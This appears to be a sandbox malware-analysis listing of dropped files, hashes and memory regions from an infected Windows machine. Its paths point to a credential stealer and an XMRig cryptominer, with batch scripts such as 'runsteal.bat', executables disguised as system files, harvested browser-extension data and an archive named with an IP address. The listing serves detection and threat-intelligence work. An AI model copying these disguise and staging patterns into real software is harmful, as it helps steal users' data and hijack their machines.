C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

MD5 5059ca903a97a0df9b6ff1ba2c7355e2
SHA1 0315f1e5af034a55a43c555a2f694d02a9f83311
SHA256 acceeafb90fed3adc9c3752847c6a7b361e6cd38a9570c73bc92be808b93fb12
SHA512 afeb543152a03cf375daa85ae6020649034b47b1be5855a5f78ed5369744228cde5156d5440bbf0a3252a3860f11f0492879781b823d230666f7cd3b4a55c0bf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 a9c7795a032679a0e9fda19ee6a7d297
SHA1 9d116d68957ba83f00c10234e64f8dfeaf1a916a
SHA256 83ed6a02a9d6d788322e4c04aa2e334da36b4789198c1306e61cffdebbd4380c
SHA512 bba521f15fd0735543b30077eb9555b3123bc4cb2384cfae66c95402b08d5aed9fdf905e707fbb9eb7b2bb370c38acb5dd4267c5a159d75e94bb65e3abe110f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 26fae3f37c08ead4ce92ce32db3bc0f2
SHA1 f450fa6b71ff3e5920d670bd87b70bedb6791a23
SHA256 f3d9fc18f3e4d628e8c2c1e4058723005727b08f10ee5224d9c9bdb6f901ecf7
SHA512 24c9983c1909ef9d0a5c8e6a2ffc72bd1bb513d9aaa4793eae7e75a20ab53dead916ab9c74c2d803770f3a7933826f0c59ab3715fe176f42cb7d6ec974ee70b6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

MD5 8c26b3909504042a8a6c262e66ea7c1f
SHA1 1f1acc55feec44dabac15a42d69a9920d105008f
SHA256 c134db85181a78611ffddef35cdb37fb20a077ffa2ff5cd48ad0765bb66e9b48
SHA512 c5677e5b88a89f6165acbe171b9c9203976afc045b23c31bbe99fba900fdbafb3dab3820570456b4af4f7cce683a3d716d736f8af2bdf7a0cf0a17f1a6c0f0bc

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json

MD5 08bacd04ef0a5559a6cfcc9e24d904df
SHA1 e867b42a0ae3f10003872bbd41bd747d30ff2856
SHA256 1e2c1c8e218e8568ddec62264594079a5ed876d5d407051189400c67a5029163
SHA512 c20eefcaacd2ad9f2a77d6fba55fac4544e72807163cc4f1b79b0917a6e1c71db17c4b50068bbc86e85ca8deb26da7f8cbe07f4cdd546aeba6077e6ea46d13aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

MD5 d7107a4051dcbb5f7373b7e4b9c1b562
SHA1 aa64399a3f570d01b5f67bf12e210d75718f05d2
SHA256 d3dd6c8603e3a5697eefde03a54a8d8cb84a264d686c0d86c8fadedb20daadc8
SHA512 12bbb40803275f85846377c727bb86e596c096194b9dd1c128d5f2153a875c4bfece235e9a8edf07596866d8cb30f7718d3a147f641c0a895380d372c4208dc3

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

memory/2628-839-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 6ea39011afddc0e92f60040daf0edbb9
SHA1 a9b0e2e5e5d65bfad85d6e4608c390ce669bc39a
SHA256 4b8f2250f588054ba486f659afc3307e42e2d039aaa12daccc637de2f35085af
SHA512 8e9e7a5e2fcd381af9d451a2187ccc8b36b9e947dad5b427b8c99c26205407f86f785986095124f6ce6fadd23fb4107164b888844277add41d6f259b9214aaa6

memory/1156-899-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/1156-907-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/1156-908-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/116-921-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2628-928-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2544-929-0x0000000000700000-0x0000000000B04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/2544-932-0x0000000000F70000-0x0000000000F7E000-memory.dmp

memory/2544-933-0x0000000005200000-0x000000000525C000-memory.dmp

memory/2544-934-0x00000000058D0000-0x0000000005E74000-memory.dmp

memory/2544-935-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/2544-936-0x0000000005370000-0x0000000005382000-memory.dmp

memory/2544-937-0x0000000005380000-0x0000000005388000-memory.dmp

memory/2544-938-0x00000000053A0000-0x00000000053A8000-memory.dmp

memory/2544-939-0x00000000053B0000-0x00000000053B8000-memory.dmp

memory/2544-940-0x0000000005860000-0x0000000005878000-memory.dmp

memory/2544-941-0x0000000005FC0000-0x0000000005FD0000-memory.dmp

memory/2544-942-0x0000000006600000-0x0000000006C28000-memory.dmp

memory/1156-944-0x0000000000F80000-0x0000000001228000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bd3zzi1u.f1z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2544-954-0x0000000006560000-0x000000000657A000-memory.dmp

memory/2544-955-0x00000000065C0000-0x00000000065F6000-memory.dmp

memory/2544-956-0x00000000074B0000-0x0000000007B2A000-memory.dmp

memory/2544-957-0x0000000006ED0000-0x0000000006F66000-memory.dmp

memory/2544-958-0x0000000007220000-0x0000000007242000-memory.dmp

memory/2544-960-0x0000000007250000-0x000000000726E000-memory.dmp

memory/2544-961-0x0000000007330000-0x000000000737A000-memory.dmp

memory/2544-959-0x00000000072C0000-0x0000000007326000-memory.dmp

memory/2544-962-0x0000000007C30000-0x0000000007F84000-memory.dmp

memory/2544-963-0x0000000008050000-0x00000000080B6000-memory.dmp

memory/2544-964-0x00000000082F0000-0x0000000008312000-memory.dmp

memory/2544-966-0x0000000008440000-0x000000000848C000-memory.dmp

memory/1156-968-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/2544-978-0x0000000009750000-0x000000000976E000-memory.dmp

memory/2544-979-0x0000000009770000-0x0000000009813000-memory.dmp

memory/2544-980-0x00000000098A0000-0x00000000098AA000-memory.dmp

memory/2544-981-0x0000000009B50000-0x0000000009B61000-memory.dmp

memory/2544-982-0x0000000009B70000-0x0000000009B7E000-memory.dmp

memory/2544-983-0x0000000009B90000-0x0000000009BA4000-memory.dmp

memory/2544-984-0x0000000009BD0000-0x0000000009BEA000-memory.dmp

memory/2544-985-0x0000000009BF0000-0x0000000009BF8000-memory.dmp

memory/2544-986-0x0000000008610000-0x000000000861A000-memory.dmp

memory/2544-991-0x0000000009BC0000-0x000000000A1D8000-memory.dmp

memory/2544-992-0x0000000008690000-0x00000000086A2000-memory.dmp

memory/2544-993-0x0000000008730000-0x000000000876C000-memory.dmp

memory/2544-994-0x0000000008880000-0x000000000898A000-memory.dmp

memory/2544-995-0x0000000008B60000-0x0000000008D22000-memory.dmp

memory/116-996-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 654c9a9b90be52cb9d0ae0c13e06712f
SHA1 9ddf4f3ae680e0b3f2b84ed4d9eb701537539cfc
SHA256 ee0cc48a6742674ab454e990d240b7ed38cbed41775e56df8c45076b0ca4b537
SHA512 c5a52af09c241eda4391518a585037423ac7db0a1388566440cefbbd7ebeaae2807679962944b19d85327a644255b4145b2d31ebc09527212c78d70b0908c0d1

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 b80037c0bd34c770845ec4580e997aab
SHA1 24e0ae64d348ec024e80bc94b6b651544f7e6b61
SHA256 dcaf52c0a4af65fbb7922043899a6c66e4a07ea21c972c316ae11ee3b023a990
SHA512 8854d8064e9f298ae0c9251ee5b14f81e22ac7f8bf22335979056e6f3c69651f1b0429d71e182817be3828fb98b2adb1d53e3d01838a205d61f52836accb4379

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 a50f83686a68f439075c62f1f3ab1138
SHA1 e09c4c29e1895b7c8382dd4beea0dd1c2eb731b9
SHA256 4a1aa1ab070cd0bdc225f13ffb7e9c746ba93ec81cfd10b8912cb30c5b1d16d5
SHA512 90930282d3bfa3d8e36b35e4895aa6892afd982ea0f734eeb3a5e34fa8eed08b651727dfdfa3a8c53e9bfee3ef26c00f74a687ab69dce4aac9c00ed12eb5a469

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/1548-1121-0x0000017FC4760000-0x0000017FC478E000-memory.dmp

memory/2628-1127-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 f515863dfc7aade03d3eb2d99a2c4501
SHA1 83703e745e1ed480e08cf053a1bbde7f87f33f02
SHA256 cbf8d419aeb512982f901994c40a1ea0ca7e13a282f8fbacae5c950a14bb2c23
SHA512 dff17827d1f50637b0b37cae31de5734ad91fc322bcdaec75f816442b2d2e535e45307d11ca50da101183b82ac9917d9cd8dd12fb8ae51898d6cb891c6d6b1ce

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 18908900c06122e66cab0b2dd95b1bbe
SHA1 af24a792815a9d15c4cb7e2bf1115bc978120902
SHA256 ae549d0bd0fdabaf4471d9fcd815b137ff0cc0ae105162ee5c864f577504dd1f
SHA512 1980235c8f4b66cb0fc911eb8b05316b511ab8a268bd91c4a1657697eff137d5e5e23a691c8251cfd8fa72abcfe592bc1c6de3e0e46fcdaf50a86c10505d6e39

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/216-1275-0x000000006EC10000-0x000000006EC5C000-memory.dmp

memory/216-1285-0x0000000006530000-0x00000000065D3000-memory.dmp

memory/216-1274-0x00000000064C0000-0x00000000064F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 36a8ab5fe4bb029eb0fc78d3a2cab6b5
SHA1 6c245318086156e640f3e08cca2fac17afa8e52c
SHA256 e911f268763b06510506752630cae301db85f5904300538adb40b12076199276
SHA512 a0438fee61643d9dc5478a2bdd2e5610242cc8fcb48f5fc825f74dd88ca22442c743282fb07bc85a07360ac6ec0162d4ae3c6c69534c6d841af8e6ea6c88f8a1

memory/216-1310-0x0000000007420000-0x0000000007431000-memory.dmp

memory/216-1355-0x0000000007460000-0x0000000007474000-memory.dmp

memory/2744-1366-0x000000006EC10000-0x000000006EC5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 76eef0061b2beda063c5a66489d4c03c
SHA1 c3ff2d8dba5c0ba788241d73ac70a92c8545dab0
SHA256 8a1c1188f87222ee2809c1974c29bf1db9b39e45c757e23356dd5df7f3e22498
SHA512 72ecf9ddc87ae231af8143db2e78c45b7bb94e9480345e72913953e951e3481d1906e00ea54d6daabe78d6f78ab74bf216b2e7abf500c4bd7468630ae8fe7481

memory/116-1587-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d36bf2c4eab0f5bddc135a170b8d496
SHA1 a7088d46f2e5438dccc39505b2ada2355704d204
SHA256 a37e77cb08a289c392f3dfadea9c7953fc2347c368be64b9cda37133767b3d64
SHA512 e0676c08ebc0cd97979c6dbd3786d11251f1f62d7c96cd4792e6879239f7ef9ecd70d6d62b2081e0cc15234eaec520153df68a930e5f2c6cfe25d1bc8b35b38d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 989f6b3eb20505afce1c56796c9eae2a
SHA1 21e88ffa0c459a666d98b54bc1fe663bceb9540f
SHA256 14da2bb8d62d6f45c4f4677afaeaada206639442aab418897d969335fcde0450
SHA512 9bc776890fe64e2450e4dd72f963b5a9485f48bb533ece7c497caface697682a97a4a2cf9bae264d4cd72e4f842c12131029387b832ed972829d6f8d596d1920

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2628-2089-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3f925a99f3d01da4891c46e54a5f019
SHA1 ceb83f8375c547c16db3d88b40074fddacdbadf2
SHA256 8c5ae5d3b15f675593ca5225c35c97a45185762f94c42466f6350c26ee17dfc5
SHA512 e2b9b4ac2030cc065ded93690db725e0abc922c68248aef121e9b8dd3189f9e04d82d9bf098a845598c38b7aeccb28d665f0b3c9cc65658a1d83ca1d509373f0

memory/1896-2136-0x0000026369200000-0x000002636922E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8d912e4d8f4291e86ae148983539474
SHA1 a54de8c3c200364d49151abbfeb80d1e6323d7b2
SHA256 b42df7b9c799e814bc3dba96ec7379428a3c9f5d5e9f27cd5fc08d945b6e2702
SHA512 baffd92146ccf3ceb736cb02d28751c2f6bfeeaff013210f7b6b12af7230314a6d9facc7d4b91f2ced0a3780be755fce7dfcd10a78c2446a8b7d02e37b005b4b

memory/6092-2629-0x0000000007370000-0x0000000007382000-memory.dmp

memory/6092-2632-0x0000000007390000-0x000000000739A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 f67672c18281ad476bb09676baee42c4
SHA1 fb4e31c9a39545d822b2f18b0b87ca465e7768c9
SHA256 d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61
SHA512 ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

MD5 0aeaac716a5e11ad3f56ddb6ccf40bcd
SHA1 d2293cf053c52c45e914eab50764f18b0fece809
SHA256 b1cea3985e29a9f8f8c9afe968104de65de901f8825db3ed3856c3d098fdf9fc
SHA512 6f37d1da5e32d28afaa3693e06852640ca41f369ca927e709d4e20422dca1599898427be3b65600af7686890c41969a83dace0bd75ccbbf0859cdf397ac814bc

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

MD5 b9d0515d6c1939a0cbf08b59c2e9b429
SHA1 00f3ff14830ff4e2457b596bf82bea105f3c0de0
SHA256 f68074654e867d82fb082a22b1281b0fd332998a5c66d205927d2f480008b657
SHA512 08dac65286753683d3dfd175a80d3815e7164f977b4cee29eab58ba45c216335a1fb3255fb60c424889d88b0997cd5012e2505a406785fa4a8011290c7678864

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

MD5 5888863aae804fff17605eea9d4a635b
SHA1 c81e1883994f9e01432c38d3c27397e5eb5b9185
SHA256 ca3b06660f910103e5176015a657d6d845a5ee3fb60a065a5264080b1e80c85d
SHA512 19f6d8d6216651168d1ffde69ae126e4fe545e9753875b0d0c9b66ecb146ade374f43843c44283e5954b4c7e5db834a1bfdfcae34130472000f6bf84807626e5

memory/116-2787-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\asm\mi.exe

MD5 f6d520ae125f03056c4646c508218d16
SHA1 f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256 d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512 d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

memory/2628-3477-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-3802-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/3528-3804-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-3810-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\asm\xmrig-cuda.dll

MD5 1b81191a719a51ad449746cc7c036243
SHA1 a22eac21ba0bd9b94e376c5c4b400e1bd99a64e0
SHA256 ac13ad51138cf50e982cab38f487ec8faad63c7014f5232873d141ef0f489ebf
SHA512 1b735facbe0e283ea4a7daa0c8cdc11a9f2ae52057656afd232f7b031f7229a46f9f2140c0b60aea2cbc3cbe78a93e604be6cca475b0780976d1ecb9deef5560